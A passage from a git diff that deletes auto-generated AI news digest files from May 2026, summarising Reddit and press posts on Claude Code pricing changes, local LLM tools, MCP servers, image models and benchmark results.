credit for Agent SDK and `claude -p` usage: $200/mo for Max 20x, $100 for Max 5x, $20 for Pro. Once you burn through it, programmatic usage stops unless you've opted into extra usage billing at API rates. Your interactive Claude Code and chat usage stays on the subscription pool, untouched. I spent the last day digging into the community reaction across Reddit, GitHub, HN, and tech press. Tracked roughly 120 distinct opinions. Here's what I found. **The sentiment split** - About 60% negative (credit is too small, feels like a value regression) - About 25% pragmatic ("this was inevitable, the old model was broken") - About 15% neutral to supportive ("interactive use is untouched, this is fair") Theo Browne (T3.gg) put it bluntly: anyone using T3 Code, Conductor, Zed, or `claude -p` in CI scripts had their effective usage cut by 25x. He said he now has to make the Claude Code experience on T3 Code "significantly worse." Ben Hylak (co-founder of Raindrop.ai) responded: "This is either really silly, or shows how bad of a spot Anthropic is in re: GPUs." Theo also said: "Framing this as a free credit instead of a regression for… - ---- - -## [Adaptive Markdown](https://reddit.com/r/ClaudeAI/comments/1tdg7yn/adaptive_markdown/) -*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 -Tags: open_source, agent_tool - -> I’ve been working on an open-source document format / viewer idea I’m calling Adaptive Markdown. The basic idea is: instead of a document being static text it's controlled by coding agents. You interact with the document more like a live workspace. This has different implications depending on what you are doing. I made a short video demo here: [https://youtu.be/H4MnFs8irm8](https://youtu.be/H4MnFs8irm8) The thing I’m most excited about is academic / technical reading. In a few years I don’t think people will just read papers passively. I think they’ll translate passages, ask questions, generate examples, explore alternate proofs, run code, attach notes, convert math to Lean when possible, and keep all of that inside the document instead of scattered across chats and notebooks. This is trivial to do inside a browser with coding agent that has access to JS, CSS etc. Some possible use cases I’m thinking about: \-Turning articles and books into personalized learning objects \- lecture notes with automatically maintained structure \-documents with embedded code, tables, consoles, images, audio, or video \-AI-generated alt text and descriptions Incorporate Adaptive Markdown into automat… - ---- - -## [Memory drift? Context bloat? A Claude Code skill I wrote to manage long-running memory libraries](https://reddit.com/r/ClaudeAI/comments/1tdtmr6/memory_drift_context_bloat_a_claude_code_skill_i/) -*Reddit r/ClaudeAI* | 15/05/2026 | Score: 0.99 -Tags: api_update, developer_tool - -> I've been running Claude Code's auto-memory on the same project for about three months. Roughly a month in, the library started getting hard to use: the same lesson recorded under three different filenames, frontmatter missing on half the files, searching for "that bug we fixed last month" returned nothing useful. Every new session, Claude loaded more and more memory files, and the context window kept getting crowded with irrelevant entries. I wrote a skill that enforces a naming schema and a bash audit script that flags drift. Sharing in case it's useful. # What the skill does Claude Code's auto-memory (v2.1.59+) writes plain markdown to `~/.claude/projects/<slug>/memory/`. The files are yours to read, edit, and version. What it doesn't enforce is structure — naming, required fields, or a Why section on each lesson. * **Schema on top of auto-memory.** `<type>_<topic>.md` naming, required frontmatter (name / description / type), Why section on feedback entries. Auto-memory still writes; the skill makes Claude write to a spec. * **Phrase-triggered review.** "Audit memory" runs the script. "Review session" walks the recent session and surfaces what's worth keeping.… - ---- - -## [SailPoint Unveils Agentic Fabric for AI Agent Security](https://aimagazine.com/news/sailpoint-unveils-agentic-fabric-for-ai-agent-security) -*AI Magazine* | Score: 0.70 -Tags: product_launch, agent_tool - ---- - -## [Open-weights vs. closed models: Nano Banana Pro was nerf'ed](https://reddit.com/r/StableDiffusion/comments/1tecqkx/openweights_vs_closed_models_nano_banana_pro_was/) -*Reddit r/StableDiffusion* | 16/05/2026 | Score: 1.00 -Tags: open_source - -> Companies think that they can nerf the model and people won't notice. Here is exhibit 1: Nano Banana Pro has fallen far from the tree. In our independent evaluation, Nano Banana Pro's image generation capability as of recently is worse than FLUX.2 \[dev\] and far from GPT-Image 2 Low. Just a reminder that no weights, not your models. https://preview.redd.it/kqon8d0jyd1h1.png?width=2212&format=png&auto=webp&s=61f3ced9f3b8f6d497d482494117e18c514bb6f3 You can explore our full calibration test set at [https://tests.drawthings.ai/generate](https://tests.drawthings.ai/generate) and [https://tests.drawthings.ai/edit](https://tests.drawthings.ai/edit). We will release the score on our full private test set soon. # 1. Charts **Top: Nano Banana Pro** **Bottom: GPT-Image 2 Low** Prompt: >A pie chart showing browser market share: Chrome 65%, Safari 20%, Firefox 10%, Other 5%. Each section should be appropriately sized and labeled with the browser name and percentage. Nano Banana Pro no longer seems able to make a simple labeled chart reliably. https://preview.redd.it/q67mipl5yd1h1.png?width=1024&format=png&auto=webp&s=4e8d0024331dfd906cda3da5e3cc307b6aec1f9e https:/… - ---- - -## [AllenAI has been iterating on their MolmoAct2 models for robotics](https://reddit.com/r/LocalLLaMA/comments/1te9unl/allenai_has_been_iterating_on_their_molmoact2/) -*Reddit r/LocalLLaMA* | 15/05/2026 | Score: 1.00 -Tags: open_source - -> r/AllenAI is cooking with MolmoAct2, a 5B vision-language-action model for robot control. They keep releasing new fine-tunes on different kinds of robotics datasets, including (but not limited to, and they keep releasing new ones): * https://huggingface.co/allenai/MolmoAct2-LIBERO - general robotics tasks * https://huggingface.co/allenai/MolmoAct2-DROID - interactive robotics tasks * https://huggingface.co/allenai/MolmoAct2-BimanualYAM - absolute joint-pose control * https://huggingface.co/allenai/MolmoAct2-SO100_101 - also absolute joint-pose control AllenAI has released these as ***fully open source*** models, publishing not only their weights but also their **complete** training datasets (including pretraining), their training software source code, and technical papers describing the theory, training, and assessments of these models. If anyone is fiddling with robots controlled via LLM inference, you should give MolmoAct2 models a look. - ---- - -## [Gemma4 26b MoE running in MLX with turboquant (and custom kernel)](https://reddit.com/r/LocalLLaMA/comments/1te6os6/gemma4_26b_moe_running_in_mlx_with_turboquant_and/) -*Reddit r/LocalLLaMA* | 15/05/2026 | Score: 1.00 -Tags: cli_tool - -> TL;DR I spent a few crazy evenings this past week seeing if I could get Gemma4 running with proper turbo quant and rotating KV cache support. The answer was yes, and I'm now able to run Gemma4 26b on my MacBook Air M5 at 128k context with 4 concurrent batches 😄 At 8k context running with no mmap, it beats llama.cpp at prompt processing, generation speed, and runtime memory: |backend|model|bpw|pp tok/s|gen tok/s|runtime mem| |:-|:-|:-|:-|:-|:-| |llama.cpp|IQ4\_XS + q4\_0 KV + flash-attn|4.25|260.6|14.66|16.0 GB| |MLX (ours)|nvfp4 + polar2|4.5|348.4|17.15|15.22 GB| It took a lot of hand-tuning to get to this speed, including a custom kernel for the SWA layers in order to get the actual runtime 2bit memory savings that enable higher batch sizes whilst staying close to full fp16 prompt processing speed The prompt processing speed scales relatively well with batch size - the major gains though are in the text generation - running a 512 token-long prompt on a 32 GB M5: |B|pp tok/s|gen tok/s| |:-|:-|:-| |1|353|16.0| |4|429|24.9| |8|451|32.4| |16|451|44.2| |32|450|48.0| |64|448|54.6| |128|440|54.0| If you want to download it and serve it yourself, you can open a terminal to a directory y… - ---- - -## [Notes from evaluating a customer support chat agent system: heuristic evaluators give false signal, retrieval bugs masquerade as LLM failures, and the cost/quality Pareto frontier is rarely where you think [D]](https://reddit.com/r/MachineLearning/comments/1te38yg/notes_from_evaluating_a_customer_support_chat/) -*Reddit r/MachineLearning* | 15/05/2026 | Score: 1.00 -Tags: api_update - -> Posting some practical findings from a structured audit of a production customer support RAG system. Methodology and caveats up front. **Methodology:** * 6 representative turns from a real production session as the eval set (small, acknowledged limitation) * LLM-as-judge using Claude Haiku 4.5, scoring relevance/accuracy/helpfulness/overall on 0-10, returning per-turn reasoning strings for verification * Same judge across all conditions, same questions, same retrieval state where possible * Production model held constant while isolating retrieval changes, then swept across 5 LLMs once retrieval was fixed * Live pricing from OpenRouter /models API rather than estimates **Findings:** 1. **Heuristic evaluation produces zero signal.** The existing evaluator counted keywords and source references. Output was numerical but uncorrelated with response quality. LLM judges with explicit rubrics caught hallucinations, identified zero-retrieval turns, and produced reasoning that could be spot-checked. The cost is real but small (cents per run) compared to shipping undetected regressions. 2. **Retrieval failures present as generation failures.** A turn where the agent said "I don't have inform… - ---- - -## [Beta testers wanted: MCP server that cuts Claude Code token burn 45–72% on architectural questions (TS/Python/Go)](https://reddit.com/r/ClaudeAI/comments/1tdy7ww/beta_testers_wanted_mcp_server_that_cuts_claude/) -*Reddit r/ClaudeAI* | 15/05/2026 | Score: 1.00 -Tags: mcp - -> Claude Code learns your codebase by brute force every session. A single architectural question such as; "Where does request validation happen?" can chew through 40+ tool calls and 100k tokens reconstructing context. Worse, the architectural decisions that *govern* your code, your ADRs, design docs, "we did it this way because" reasoning are completely invisible to it. Claude will happily propose changes that break constraints you wrote down two months ago. I built an MCP server that pre-computes a structured atlas of your codebase (LSP symbols + ADRs + git history + test associations) and serves it to Claude in a fraction of the calls via compact chunks at execution time. Internal benchmarks show **45–72% token reduction on architectural-intent prompts**, replicated across TypeScript (hono), Python (httpx), and Go (cobra) targets. Methodology is paired-mode LLM-judge with pre-registered thresholds. Full rubric and benchmarks repo are public. I also saw cleaner scope adherence and better design choices when implementing new features, driven by the `impact_of_change` tool surfacing constraints before Claude proposes work. v1.0.0 is planned to ship next week. Before then I hoped to f… - ---- - diff --git a/data/digest-2026-05-16.md b/data/digest-2026-05-16.md deleted file mode 100644 index 1c37077..0000000 --- a/data/digest-2026-05-16.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-16** | 15 stories | Auto-generated from 407 archived stories - ---- - -## [Follow-up: the Claude design-spec library is 100 apps now, iOS + Android.](https://reddit.com/r/ClaudeAI/comments/1tevt37/followup_the_claude_designspec_library_is_100/) -*Reddit r/ClaudeAI* | 16/05/2026 | Score: 1.00 -Tags: mcp, open_source, developer_tool, cli_tool - -> Yesterday I posted about turning 50 apps into Claude-readable design specs. It did better than expected, and the two asks in the comments were: more apps, and Android. Both done. The library is now: \- 100 apps (was 50) \- iOS and Android spec for every one The Android pass surfaced something the iOS-only version hid. The problem: an iOS-only spec quietly encodes HIG assumptions you didn't know you were making. Hand it to Claude, ask for the Android build, and you get an iOS app in Android's clothes: \- back behavior wrong, no system back \- flat surfaces, no Material elevation \- tab bar where a nav drawer or bottom nav belongs \- SF type scale instead of Roboto and Material The fix: split each spec into two layers. \- Product intent: hierarchy, flow, states. Invariant across platforms. \- Platform layer: Material vs HIG conventions. Swappable. Claude clones far more cleanly when it isn't guessing which layer it's looking at. Repo, both layers, 100 apps, 3 depths each, markdown, MIT, no dependencies: [github.com/Meliwat/awesome-ios-design-md](http://github.com/Meliwat/awesome-ios-design-md) The MCP server and CLI that generate these are free and open source too, so you can spec y… - ---- - -## [GitHub - richardr1126/openreader: An open-source read-along document reader server with high-quality TTS options, synchronized highlighting, and audiobook export for EPUB, PDF, DOCX, TXT, and MD.](https://reddit.com/r/LocalLLaMA/comments/1tf15eh/github_richardr1126openreader_an_opensource/) -*Reddit r/LocalLLaMA* | 16/05/2026 | Score: 1.00 -Tags: api_update, open_source, github_release - -> Sharing my latest release of OpenReader v3.0.0, an open-source text-to-speech document reader and audiobook exporter. It has been live for over a year now, and slowly has gained 300+ GitHub stars. **What is OpenReader?** A Next.js web app for reading and listening to EPUB, PDF, TXT, Markdown, and DOCX files. * Supports multiple TTS providers: OpenAI, Replicate, Deepinfra, and self-hosted OpenAI-compatible APIs (like [Kokoro-FastAPI](https://github.com/remsky/Kokoro-FastAPI), [KittenTTS-FastAPI](https://github.com/richardr1126/KittenTTS-FastAPI)). * **Self-hosted:** your documents, TTS audio, and settings all live on your own server in SQLite or Postgres and Embedded SeaweedFS or External S3. * **Audiobook export:** generate and download m4b/mp3 audiobooks with chapter metadata via ffmpeg. **What's new in v3.0.0?** * TTS now preloads audio across multiple pages ahead of where you are. * Audio is cached persistently on the server's embedded or external object storage. * New Admin panel (set `ADMIN_EMAILS` in your env) for managing multiple named TTS providers with separate API keys. * Site-wide feature flags (user signups, provider restrictions, etc.) are now manageable from the Adm… - ---- - -## [macOS support in Lemonade has graduated out of beta!](https://reddit.com/r/LocalLLaMA/comments/1tevjjr/macos_support_in_lemonade_has_graduated_out_of/) -*Reddit r/LocalLLaMA* | 16/05/2026 | Score: 1.00 -Tags: api_update, open_source, developer_tool - -> All major Lemonade capabilities, including OmniRouter, coding, image gen, speech gen, and transcription are all available on Lemonade for macOS thanks to the hard work of u/GeramyL. If you're on macOS and just looking into Lemonade for the first time, we're a local AI solution similar in functionality to LM Studio or Ollama. What sets us apart is: - Open source, community driven, zero telemetry - Focused on local with no cloud upsell - Omni-modal with the ability to input and output images and speech - Developer friendly with a 3 MB portable binary, code once and deploy across Linux/Windows/macOS I hope this release brings more macOS users into the Lemonade community. Stay tuned for the update iPhone app, which can access all of this from your phone! GitHub: https://github.com/lemonade-sdk/lemonade Discord: https://discord.gg/5xXzkMu8Zk - ---- - -## [Claude Code in VS Code keeps “answering” by freezing mid-stream, logs show sdk_stream_ended_no_result](https://reddit.com/r/ClaudeAI/comments/1tenric/claude_code_in_vs_code_keeps_answering_by/) -*Reddit r/ClaudeAI* | 16/05/2026 | Score: 0.94 -Tags: api_update, mcp, developer_tool - -> [error message on Claude extension for VS Code](https://preview.redd.it/08qtvuaamg1h1.png?width=910&format=png&auto=webp&s=6c2d4005bcdd6e5c058e5235b8d76b0512753ee6) I’m trying to use Claude Code in VS Code, but it has become almost unusable for larger tasks. The logs show Claude authenticates fine, sends the /v1/messages request, receives the first stream chunk, then the stream stalls. After about 30 seconds the UI reports an error with: eventName: "sdk\_stream\_ended\_no\_result", had\_error: true It is not a simple auth/config failure: OAuth check completes, context window says OK, and the API stream opens. Smaller requests seem to work, but larger multi-part prompts repeatedly freeze with stream stall warnings like: \[Stall\] stream\_idle\_partial lastChunkAgeMs=15002 bytesTotal=669 idleDeadlineMs=300000 There are some unrelated MCP auth/config errors too, but the main issue is that Claude starts responding and then stops producing a usable answer. Has anyone else seen Claude Code/VS Code fail this way on large prompts? Is this a known streaming bug, server-side issue, or something caused by heavy tool/skill context? - ---- - -## [WSL can't reach Kobold.cpp running on Windows, even though the API works fine in PowerShell, SillyTavern & a Kenshi SentientSands Mod. Does anyone know the solution?](https://reddit.com/r/LocalLLaMA/comments/1tf7f4d/wsl_cant_reach_koboldcpp_running_on_windows_even/) -*Reddit r/LocalLLaMA* | 16/05/2026 | Score: 1.00 -Tags: api_update, cli_tool - -> Okay sorry for the slop below but I'm losing my mind with this and I'm hoping someone here has dealt with the same setup. (I asked the AI that let me copy&paste shit for 3 hours to summarise what it asked me to do) Here's the situation: * Kobold.cpp is running on Windows * The OpenAI-compatible API is on port 5001 * It works from PowerShell on Windows, SillyTavern and a Kenshi Mod (SentientSands) * But WSL cannot connect to it, even though it's the same machine Kobold.cpp starts normally and shows that the OpenAI-compatible API is running on `http://0.0.0.0:5001/v1/`. From **PowerShell**, this works fine: bash curl http://127.0.0.1:5001/v1/models and it returns the model list. From **WSL**, `pwd` works normally, but this fails: bash curl http://127.0.0.1:5001/v1/models with: bash curl: (7) Failed to connect to 127.0.0.1 port 5001 after 0 ms: Could not connect to server So at this point I know: * Kobold itself is running fine * The API endpoint is working on Windows * The actual problem is specifically WSL trying to reach a service hosted on the Windows side Things I already tried: * Binding Kobold to [`0.0.0.0`](http://0.0.0.0) instead of only localhost * Changing WSL config t… - ---- - -## [I replicated Anthropic's Generator-Evaluator harness to build a website through 12 adversarial AI iterations - here's the result and what I learned](https://reddit.com/r/ClaudeAI/comments/1tf76wp/i_replicated_anthropics_generatorevaluator/) -*Reddit r/ClaudeAI* | 16/05/2026 | Score: 1.00 -Tags: mcp, cli_tool - -> Anthropic recently published their [harness design for long-running apps](https://www.anthropic.com/engineering/harness-design-long-running-apps) — a multi-agent architecture inspired by GANs where a Generator builds code and an Evaluator critiques it in a loop. I built my own version using Kiro CLI and used it to generate a marketing website for my project [Mnemo](https://github.com/Mnemo-mcp/Mnemo) (persistent memory for AI coding agents). **The architecture:** Planner (runs once) → Generator ↔ Evaluator (12 iterations) Each agent is a separate CLI process with zero shared context. They communicate only through files (spec.md, eval-report.md). The Evaluator uses Playwright to actually browse the live site — not just read code. **What made it work:** **Clean slate per invocation** — each agent starts fresh, reads only its input files. Prevents context anxiety. **Playwright MCP for testing** — the evaluator navigates, clicks, resizes viewports. Catches visual bugs code review never would. **Anthropic's frontend design skill** — explicitly penalizes generic AI patterns (Inter font, purple gradients, card layouts). Forces creative risk-taking. **Continuous iteration, not retry-on-fa… - ---- - -## [Interconnects newsletter reviews wave of open AI releasesOpen AI models saw a burst of new releases this month from several labs. The Interconnects newsletter reviewed five of them, including Gemma 4 and DeepSeek V4, using the CAISI V4 evaluation framework.](https://www.digg.com/ai/09imapy5?rank=7) -*Digg AI* | Score: 1.00 -Tags: product_launch, developer_tool - ---- - -## [How I started programming differently over the last year. What about you?](https://reddit.com/r/LocalLLaMA/comments/1tf2cxh/how_i_started_programming_differently_over_the/) -*Reddit r/LocalLLaMA* | 16/05/2026 | Score: 1.00 -Tags: cli_tool, agent_tool - -> An interesting observation: I’ve stopped using the LLM-powered autocomplete in my IDE. At first, it was one of the key features for me. It felt extremely convenient: you start writing a function in your code, and the LLM completes it based on common sense or the context from the open tabs. But the most interesting thing is that back when LLM autocomplete was useful and in demand, I had already written a script that could go through the source files, let me select what I needed, and prepare the context to feed into an LLM chat so it could tell me what to add or fix. I worked like that for about six months. And even that is gone now. These days it’s easier to open a CLI interface with a coding agent, without even launching the IDE. You describe what you need, use @ to point it to the files it should inspect or modify, and that’s it. Everything is changing at an absolutely insane speed. Basically, the only things I still use an IDE for are nice Git diff visualization, step-by-step debugging, and the ability to click on functions and jump into their implementation. In other words, code navigation. And even that functionality is only needed in about 5-10% of my work. It’s interesting t… - ---- - -## [LLM Phone Home: Reliable Apps that can deliver inference from local backend](https://reddit.com/r/LocalLLaMA/comments/1tez9sb/llm_phone_home_reliable_apps_that_can_deliver/) -*Reddit r/LocalLLaMA* | 16/05/2026 | Score: 1.00 -Tags: api_update, mcp - -> Hello all, I’m wondering what suggestions there are for an ios app that can serve an openai compatible endpoint. I am using 3sparks which works GREAT for that specific use, BUT, there is no mcp, no web search, etc. I want to show people that a local model with web search on your phone is very impressive, but I can’t find an app that can mimic OWUI/LMS/etc. Texting Hermes works but I was hoping to find a solution that is not using a slow agent, just calling requests from local server. So far, I tried: Apollo, Locally AI, Noema, and 3 Sparks. Previously I have gone through other apps that run models in situ (in the iphone) but they don’t have remote endpoint usage. Noema seemed promising but Deepseek V4 Flash from my mac studio never makes it through a request (works great with 3 Sparks, but no web search or mcp capability). - ---- - -## [Frameo AI Launches Pixar-Style Short Films Powered by Seedance 2.0 — Native Audio, Multi-Shot, Director Mode](https://x.com/frameo_ai/status/2055642282796400821) -*Aligned News (Scoble)* | 16/05/2026 | Score: 1.00 -Tags: product_launch, tool_update - -> Frameo AI launched Pixar-quality short films on Seedance 2.0 with native audio and Director Mode, making cinematic AI video creation accessible to independent creative producers. - ---- - -## [How Do You Tell If Someone Is Good at Agents? — Scoble Asks the Question the AI Industry Cannot Answer](https://x.com/Scobleizer/status/2055566706714845328) -*Aligned News (Scoble)* | 16/05/2026 | Score: 1.00 -Tags: developer_tool, agent_tool - -> Scoble's question on evaluating agent development talent surfaces the unsolved hiring signal problem as companies scramble for AI agent skills with no reliable credential or assessment framework. - ---- - -## [Qwen3.6-35B-A3B and 9B are officially on the public Terminal-Bench 2.0 leaderboard!](https://reddit.com/r/LocalLLaMA/comments/1temio0/qwen3635ba3b_and_9b_are_officially_on_the_public/) -*Reddit r/LocalLLaMA* | 16/05/2026 | Score: 1.00 -Tags: open_source, cli_tool - -> Qwen3.6-35B-A3B and 9B are officially on the public Terminal-Bench 2.0 leaderboard! little-coder × Qwen3.6-35B-A3B hit 24.6% (±3.2), and **now land above Gemini 2.5 Pro on Gemini CLI (19.6%)** and Qwen3-Coder-480B on Terminus 2 (23.9%). I didn’t expect the scaffold-model gap from Polyglot to hold on a benchmark this hard but it did! little-coder × Qwen3.5-9B came in at 9.2% which is more humble. Yet, it also shows again that **sub-10B local models are now measurable on a hard agentic benchmark**, not assumed unworthy of a slot. Just felt it was right to follow up here as you requested, and say a genuine thanks to this community. It really is the place currently driving innovation toward less compute, and this run exists there because you pushed for it. Now it’s time to head for the top of the leaderboard 👀 let’s go open source! - ---- - -## [Claude in Chrome extension stopped working in claude.ai after using Claude Code — anyone else?](https://reddit.com/r/ClaudeAI/comments/1teudps/claude_in_chrome_extension_stopped_working_in/) -*Reddit r/ClaudeAI* | 16/05/2026 | Score: 0.88 -Tags: developer_tool, cli_tool - -> Hey everyone, running into a weird issue and hoping someone has seen this before. A few hours ago, Claude in Chrome was working fine in the claude.ai web app. Then I started using Claude Code (CLI) with the \`--chrome\` flag, which connected to the extension no problem. Ever since, the extension refuses to connect from claude.ai — but it still works fine from Claude Code and the extension itself appears active and logged in. \*\*Setup:\*\* \- Claude in Chrome extension installed and signed in \- Same account on [claude.ai](http://claude.ai) and Claude Code \- Extension shows as active in Chrome toolbar \*\*What works:\*\* \- ✅ Claude Code CLI (\`claude --chrome\`) connects to the browser fine \- ✅ Extension itself appears active and logged in \- ❌ [claude.ai](http://claude.ai) web app: consistently returns "Browser extension is not connected" \*\*What I've already tried (nothing helped):\*\* \- Restarted Chrome \- Restarted PC \- Logged out and back into [claude.ai](http://claude.ai) \- Disabled and re-enabled the extension My theory: once Claude Code connected to the extension, it somehow "claimed" the connection and the [claude.ai](http://claude.ai) web app can no longer get thr… - ---- - -## [Free Premiere Pro extension to download YouTube/Instagram/X videos and auto-import to your project bin](https://reddit.com/r/ClaudeAI/comments/1tf20ta/free_premiere_pro_extension_to_download/) -*Reddit r/ClaudeAI* | 16/05/2026 | Score: 0.78 -Tags: open_source, developer_tool - -> Tired of the whole workflow — open browser, find video, download, wait, drag into Premiere. So I built a panel that does it all from inside Premiere. Paste a URL, pick quality, click Download & Import — file lands directly in your project bin. Supports: \- YouTube, Instagram, X/Twitter \- Best / 1080p / 720p / 480p / MP3 \- Live progress bar with ETA \- Auto-import to project bin on finish Powered by yt-dlp under the hood. Built this with the help of Claude (AI) — had the idea and kept iterating until it worked. Free & open source: [https://github.com/gitttsarya/media-fetcher-premiere](https://github.com/gitttsarya/media-fetcher-premiere) Full install guide in the README. Let me know if you run into any issues! https://preview.redd.it/y5svnpjuoj1h1.png?width=482&format=png&auto=webp&s=0dfb391daefb06dbbb37c4b13174efc6a1ca7a22 - ---- - -## [Using Claude chat for making Apps.](https://reddit.com/r/ClaudeAI/comments/1teum62/using_claude_chat_for_making_apps/) -*Reddit r/ClaudeAI* | 16/05/2026 | Score: 0.78 -Tags: api_update, cli_tool - -> I have been using Claude chat to build structural engineering calculation apps, and it has worked very well for me. Claude generates the files, and I host the projects on GitHub. To avoid hitting the context window limit, I periodically start new chat sessions. When I do, I download the ZIP file from GitHub (including the MD file), and paste it into the new chat so Claude has the project context again. I was wondering if there are any drawbacks to working this way. I do not use Claude Code (don’t have coding background )or the terminal much. I tried it once but did not really like the workflow. Most of my coding is done on the go through the chat interface on my phone or on my computer at work and at home. - ---- - diff --git a/data/digest-2026-05-17.md b/data/digest-2026-05-17.md deleted file mode 100644 index 94e8b0c..0000000 --- a/data/digest-2026-05-17.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-17** | 15 stories | Auto-generated from 420 archived stories - ---- - -## [I built SeeFlow - architecture diagrams that actually run, wired to your live app](https://reddit.com/r/ClaudeAI/comments/1tfd6j6/i_built_seeflow_architecture_diagrams_that/) -*Reddit r/ClaudeAI* | 17/05/2026 | Score: 1.00 -Tags: mcp, open_source, developer_tool, tool_update - -> Architecture diagrams rot. You spend an afternoon in Confluence, three months later it's wrong, and nobody updates it because there's no forcing function. https://preview.redd.it/9svmg8ih3m1h1.png?width=2508&format=png&auto=webp&s=0d06df1f82fd417ee9a45e504efd26628eaf33fd SeeFlow tries to fix that by making diagrams executable. It generates a flow canvas from your codebase, then wires each node to your actual running app. There's a Claude Code / Codex/ Cursor / Windsurf plugin that does the heavy lifting: >/seeflow show me the shopping cart feature It also ships an MCP server so any MCP-aware editor can register and edit demos without leaving the IDE. Link to the site: [https://seeflow.dev](https://seeflow.dev) 100% Free/ MIT Open Source - ---- - -## [ROCm 7.13 nightly adds strix halo optimizations](https://reddit.com/r/LocalLLaMA/comments/1tftg09/rocm_713_nightly_adds_strix_halo_optimizations/) -*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 -Tags: product_launch, open_source, tool_update - -> [https://www.phoronix.com/news/ROCm-7.13-Released](https://www.phoronix.com/news/ROCm-7.13-Released) Quote: ...new optimizations for Ryzen AI Max 300 "Strix Halo" and the ROCprof Trace Decoder is now open-source...<snip>... Those rolling from source can grab the ROCm 7.13 Tech Preview via [TheRock on GitHub](https://github.com/ROCm/TheRock/releases/tag/therock-7.13). [https://rocm.docs.amd.com/en/7.13.0-preview/about/release-notes.html](https://rocm.docs.amd.com/en/7.13.0-preview/about/release-notes.html) Trivia: Rocm name origin: radeon open compute module - ---- - -## [I updated my tool that turns any book into character & landscape images using RAG + ComfyUI/Gemini — now with Locations support!](https://reddit.com/r/StableDiffusion/comments/1tfro2h/i_updated_my_tool_that_turns_any_book_into/) -*Reddit r/StableDiffusion* | 17/05/2026 | Score: 0.78 -Tags: api_update, open_source, tool_update - -> Hey everyone! I am back with an update to my character generation tool. I got some great feedback when I posted it here, I am pleased to announce that I have integrated a lot of requested features and added a lot more ! **Big thanks to everyone who tried the tool from the first post and gave valuable suggestions !** All the updates and features for just 2.99 a month ! No, just kidding, still fully open source. **Image gallery -** Modern Dracula adaptation, plus some characters from the Eye of the world ( which inspired this whole project ). Tool screenshots at the end. # What's new in this update? # 🔧 QoL updates ! Configurable .env file, api endpoints for Ollama, OpenAI etc, database for books generated, character details saved after generation, image gallery, prompt save feature, installer, updated UI, support for epub/text, Gemini image integration, collapsible sidebars, task manager widget, debug panel to test connections or databases, and tons more # 📍 Locations Tab — "The one I didn't know I needed" This was the exciting one. You can now generate **landscape/architectural images** for prominent locations in the book — not just characters. * Click **"Extract Locations from… - ---- - -## [Are local models good enough yet for AI meeting memory?](https://reddit.com/r/LocalLLaMA/comments/1tfukyl/are_local_models_good_enough_yet_for_ai_meeting/) -*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 -Tags: mcp, tool_update - -> I’ve been testing different ways to handle AI meeting notes and realized the most useful part isn’t the summary, it’s having searchable context from past meetings later. Right now I’m using Bluedot because it handles capture really well, transcripts, summaries, action items, recordings, all searchable after. The new Claude MCP integration made me realize how valuable meeting history becomes once you can actually query it naturally. Are you building local AI meeting memory setups, or are cloud tools still way ahead for this use case? - ---- - -## [NeuralCompanion](https://reddit.com/r/StableDiffusion/comments/1tftqwg/neuralcompanion/) -*Reddit r/StableDiffusion* | 17/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> NeuralCompanion is an open-source, local-first AI companion project for people who like building, experimenting, and seeing how far personal AI can go on their own hardware. It brings together realtime voice chat, local LLMs, TTS/STT, image generation, interactive tutorials, API-friendly workflows, and a modular addon system into one desktop app designed to be flexible, hackable, and genuinely fun to explore. NC also supports avatar systems and avatar engines like VSeeFace, VAM/VAM2, and other experimental realtime avatar workflows. It is still experimental and a little rough around the edges in places, but that is part of the project. The goal is not to make another locked-down corporate assistant. It is to build a customizable AI companion platform you can actually run, modify, and shape yourself. If you are into local AI, creative tools, avatars, plugins, voice interfaces, automation, or weird future-facing software, come take a look. GitHub: [https://github.com/Rakile/NeuralCompanion](https://github.com/Rakile/NeuralCompanion) Discord: [https://discord.com/invite/UqnwX46rcK](https://discord.com/invite/UqnwX46rcK) Developers, tinkerers, artists, AI enthusiasts, and curious peop… - ---- - -## [Made a simple template manager and GUI for llama.cpp so I don't have to keep memorizing CLI flags.](https://reddit.com/r/LocalLLaMA/comments/1tfqrbt/made_a_simple_template_manager_and_gui_for/) -*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 -Tags: product_launch, cli_tool - -> [Introducing Hexllama](https://reddit.com/link/1tfqrbt/video/uobdgqq1hp1h1/player) Hey, I’ve always found **llama-server** to be more than enough for testing out local models, mostly because it guarantees you always have the absolute latest llama.cpp features and architecture support. But keeping track of different CLI commands, context sizes, and batch settings for different models was becoming a massive headache. Plus, managing multiple terminal tabs when I wanted to run two models at once was annoying. So, I built **Hexllama**. It's a fast desktop interface that gets out of your way and just makes managing llama.cpp easier. No walled gardens, just a clean wrapper. **What it actually does:** * **Template-Based Execution:** You configure your CLI flags (threads, context, etc.) once via a visual editor, save it as a template, and from then on it’s just one click to run. * **Built-in llama.cpp Version Manager:** This is the feature I use the most. It auto-checks the ggml-org repo, lets you download new releases directly in the app, and lets you swap backends instantly (super useful when a new model architecture drops and needs a specific build). * **Integrated HF Downloader:** Sear… - ---- - -## [Kimi K 2.6 is good and can get free api keys from Nvidia integrate with aider launch in powershell and you got something same as claude code for testing new ideas before paying for claude subscription](https://x.com/lordsa_m/status/2055959075012104631) -*X search / AI model updates* | 17/05/2026 | Score: 1.00 -Tags: api_update, cli_tool - -> Kimi K 2.6 is good and can get free api keys from Nvidia integrate with aider launch in powershell and you got something same as claude code for testing new ideas before paying for claude subscription - ---- - -## [Is there a new Wan2.2 lightx2v (20260412) FP8 version for ComfyUI?](https://reddit.com/r/StableDiffusion/comments/1tfkwx7/is_there_a_new_wan22_lightx2v_20260412_fp8/) -*Reddit r/StableDiffusion* | 17/05/2026 | Score: 1.00 -Tags: github_release, tool_update - -> I decided to check the `lightx2v` Hugging Face account and noticed they released an updated version of their distilled Wan2.2 i2v A14b model about a month ago. They uploaded a new version 20260412 on Hugging Face, "Wan2.2-Distill-Models" repository. (Can't post a link because Reddit filters block the post) However, they only uploaded the FP32 version, which is also incompatible with ComfyUI. I can't find a converted version via Google or Hugging Face search. Does anyone know how to convert this model to FP8, or would someone be willing to convert it and upload it? - ---- - -## [Jackrong/Qwopus3.5-9B-Coder-GGUF · Hugging 